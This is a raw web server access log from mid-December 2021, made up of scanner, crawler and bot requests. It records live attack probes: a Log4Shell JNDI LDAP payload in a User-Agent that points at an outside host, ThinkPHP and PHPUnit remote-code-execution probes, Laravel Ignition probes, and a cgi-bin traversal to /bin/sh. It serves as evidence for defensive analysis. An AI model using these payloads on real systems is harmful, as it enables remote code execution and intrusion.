54.186.164.94 - - [14/Dec/2021:01:25:11 +0100] "GET / HTTP/1.1" 301 295 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 54.190.132.5 - - [14/Dec/2021:01:34:27 +0100] "GET / HTTP/1.1" 301 295 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 192.236.147.66 - - [14/Dec/2021:03:16:04 +0100] "GET /wp-content/plugins/capability-manager-enhanced/common/js/admin.dev.js HTTP/1.1" 301 463 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36" 195.54.160.149 - - [14/Dec/2021:03:24:58 +0100] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 301 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 195.251.41.139 - - [14/Dec/2021:03:48:09 +0100] "GET / HTTP/1.1" 301 301 "-" "/${jndi:ldap://45.83.193.150:1389/Exploit}" 192.241.215.36 - - [14/Dec/2021:04:00:11 +0100] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 301 348 "-" "Mozilla/5.0 zgrab/0.x" 89.248.165.52 - - [14/Dec/2021:04:09:50 +0100] "-" 408 - "-" "-" 192.241.214.179 - - [14/Dec/2021:04:14:41 +0100] "GET /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f HTTP/1.1" 301 335 "-" "Mozilla/5.0 zgrab/0.x" 131.220.6.152 - - [14/Dec/2021:04:53:11 +0100] "GET / HTTP/1.1" 301 295 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 34.96.130.11 - - [14/Dec/2021:04:59:05 +0100] "GET / HTTP/1.1" 301 377 "-" "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" 192.35.168.96 - - [14/Dec/2021:05:04:03 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 zgrab/0.x" 195.54.160.149 - - [14/Dec/2021:05:08:07 +0100] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 301 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 195.54.160.149 - - [14/Dec/2021:06:05:15 +0100] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 301 390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 195.54.160.149 - - [14/Dec/2021:06:57:13 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 301 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 89.248.165.52 - - [14/Dec/2021:07:08:15 +0100] "-" 408 - "-" "-" 1.179.247.182 - - [14/Dec/2021:08:41:05 +0100] "GET / HTTP/1.1" 301 383 "-" "curl/7.58.0" 1.179.247.182 - - [14/Dec/2021:08:41:06 +0100] "GET / HTTP/1.1" 301 383 "-" "curl/7.58.0" 1.179.247.182 - - [14/Dec/2021:08:41:08 +0100] "GET / HTTP/1.1" 301 383 "-" "curl/7.58.0" 1.179.247.182 - - [14/Dec/2021:08:41:08 +0100] "GET / HTTP/1.1" 301 383 "-" "curl/7.58.0" 195.54.160.149 - - [14/Dec/2021:08:56:33 +0100] "GET /console/ HTTP/1.1" 301 307 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 66.249.64.96 - - [14/Dec/2021:09:19:04 +0100] "GET /robots.txt HTTP/1.1" 301 304 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 66.249.64.103 - - [14/Dec/2021:09:19:05 +0100] "GET / HTTP/1.1" 301 297 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 195.54.160.149 - - [14/Dec/2021:09:57:25 +0100] "GET /_ignition/execute-solution HTTP/1.1" 301 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 89.145.206.105 - - [14/Dec/2021:09:59:47 +0100] "GET /?q=%7Bjndi%!A(MISSING)ldap%!A(MISSING)%!F(MISSING)%!F(MISSING)log4shell.huntress.com%!A(MISSING)1389%!F(MISSING)5e4155fe-0cec-4964-a51c-1acdc8fabe8d%!D(MISSING) HTTP/1.1" 301 387 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" 199.249.230.163 - - [14/Dec/2021:10:24:08 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" 171.25.193.77 - - [14/Dec/2021:10:25:19 +0100] "GET /favicon.ico HTTP/1.1" 301 309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" 195.54.160.149 - - [14/Dec/2021:10:55:39 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 208.100.26.236 - - [14/Dec/2021:11:28:17 +0100] "GET / HTTP/1.1" 301 297 "-" "Mozilla/5.0 (iPad; CPU OS 11_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1" 103.149.192.26 - - [14/Dec/2021:11:50:45 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 141.98.83.139 - - [14/Dec/2021:12:32:48 +0100] "GET / HTTP/1.1" 301 383 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0" 45.146.164.160 - - [14/Dec/2021:13:04:44 +0100] "GET / HTTP/1.1" 301 301 "-" "Go-http-client/1.1" 45.146.164.160 - - [14/Dec/2021:13:04:45 +0100] "GET / HTTP/1.1" 301 301 "-" "Go-http-client/1.1" 195.54.160.149 - - [14/Dec/2021:13:11:02 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 293 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 65.49.20.68 - - [14/Dec/2021:13:20:29 +0100] "GET / HTTP/1.1" 301 383 "-" "-" 192.241.200.201 - - [14/Dec/2021:13:47:07 +0100] "GET /actuator/health HTTP/1.1" 301 310 "-" "Mozilla/5.0 zgrab/0.x" 195.54.160.149 - - [14/Dec/2021:13:56:16 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 61.219.11.151 - - [14/Dec/2021:14:29:42 +0100] "-" 408 - "-" "-" 86.109.208.194 - - [14/Dec/2021:14:30:50 +0100] "GET / HTTP/1.1" 301 383 "-" "curl/7.58.0" 86.109.208.194 - - [14/Dec/2021:14:30:50 +0100] "GET / HTTP/1.1" 301 383 "-" "curl/7.58.0" 86.109.208.194 - - [14/Dec/2021:14:30:50 +0100] "GET / HTTP/1.1" 301 383 "-" "curl/7.58.0" 86.109.208.194 - - [14/Dec/2021:14:30:51 +0100] "GET / HTTP/1.1" 301 383 "-" "curl/7.58.0" 185.180.143.79 - - [14/Dec/2021:14:52:21 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 5.188.206.26 - - [14/Dec/2021:15:57:22 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" 170.130.187.42 - - [14/Dec/2021:16:28:33 +0100] "GET / HTTP/1.1" 400 374 "-" "https://gdnplus.com:Gather Analyze Provide." 185.180.143.147 - - [14/Dec/2021:17:30:54 +0100] "GET / HTTP/1.1" 301 297 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36" 208.100.26.233 - - [14/Dec/2021:17:42:07 +0100] "HEAD /core/misc/drupal.js HTTP/1.1" 301 - "-" "Mozilla/5.0 (Android 7.0; Mobile; rv:65.0) Gecko/65.0 Firefox/65.0" 34.77.162.3 - - [14/Dec/2021:18:27:50 +0100] "GET / HTTP/1.1" 301 393 "-" "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" 121.40.119.88 - - [14/Dec/2021:18:35:22 +0100] "POST /_ignition/execute-solution HTTP/1.1" 301 319 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" 121.40.119.88 - - [14/Dec/2021:18:35:26 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" 121.40.119.88 - - [14/Dec/2021:18:35:29 +0100] "GET /script HTTP/1.1" 301 305 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" 121.40.119.88 - - [14/Dec/2021:18:35:33 +0100] "GET /login HTTP/1.1" 301 305 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" 121.40.119.88 - - [14/Dec/2021:18:35:37 +0100] "GET /jenkins/login HTTP/1.1" 301 312 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" 121.40.119.88 - - [14/Dec/2021:18:35:42 +0100] "GET /manager/html HTTP/1.1" 301 308 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" 121.40.119.88 - - [14/Dec/2021:18:35:45 +0100] "GET /wp-login.php HTTP/1.1" 301 311 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" 121.40.119.88 - - [14/Dec/2021:18:35:48 +0100] "GET /?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=mx05rkbm HTTP/1.1" 301 383 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" 121.40.119.88 - - [14/Dec/2021:18:35:51 +0100] "GET /users/sign_in HTTP/1.1" 301 311 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" 192.241.213.90 - - [14/Dec/2021:18:58:52 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 zgrab/0.x" 95.211.247.72 - - [14/Dec/2021:21:37:44 +0100] "GET / HTTP/1.1" 301 303 "-" "Mozilla/5.0 zgrab/0.x" 71.6.167.142 - - [14/Dec/2021:22:23:52 +0100] "GET / HTTP/1.1" 301 383 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" 71.6.167.142 - - [14/Dec/2021:22:24:02 +0100] "" 400 379 "-" "-" 71.6.167.142 - - [14/Dec/2021:22:24:03 +0100] "" 400 379 "-" "-" 71.6.167.142 - - [14/Dec/2021:22:24:04 +0100] "" 400 379 "-" "-" 71.6.167.142 - - [14/Dec/2021:22:24:08 +0100] "quit" 400 379 "-" "-" 71.6.167.142 - - [14/Dec/2021:22:24:09 +0100] "GET /robots.txt HTTP/1.1" 301 393 "-" "-" 71.6.167.142 - - [14/Dec/2021:22:24:09 +0100] "GET /sitemap.xml HTTP/1.1" 301 394 "-" "-" 71.6.167.142 - - [14/Dec/2021:22:24:11 +0100] "GET /.well-known/security.txt HTTP/1.1" 301 407 "-" "-" 71.6.167.142 - - [14/Dec/2021:22:24:13 +0100] "GET /favicon.ico HTTP/1.1" 301 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0" 71.6.167.142 - - [14/Dec/2021:22:24:14 +0100] "-" 408 - "-" "-" 71.6.167.142 - - [14/Dec/2021:22:24:16 +0100] "" 400 379 "-" "-" 195.54.160.149 - - [14/Dec/2021:23:57:54 +0100] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 301 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 192.241.209.10 - - [15/Dec/2021:00:21:45 +0100] "GET /ReportServer HTTP/1.1" 301 307 "-" "Mozilla/5.0 zgrab/0.x" 192.241.201.179 - - [15/Dec/2021:00:41:28 +0100] "GET /login HTTP/1.1" 301 305 "-" "Mozilla/5.0 zgrab/0.x" 152.32.134.14 - - [15/Dec/2021:00:41:41 +0100] "GET / HTTP/1.0" 301 383 "-" "-" 207.46.13.127 - - [15/Dec/2021:00:46:28 +0100] "GET / HTTP/1.1" 301 304 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" 130.211.54.158 - - [15/Dec/2021:00:58:53 +0100] "GET / HTTP/1.1" 301 301 "-" "python-requests/2.26.0"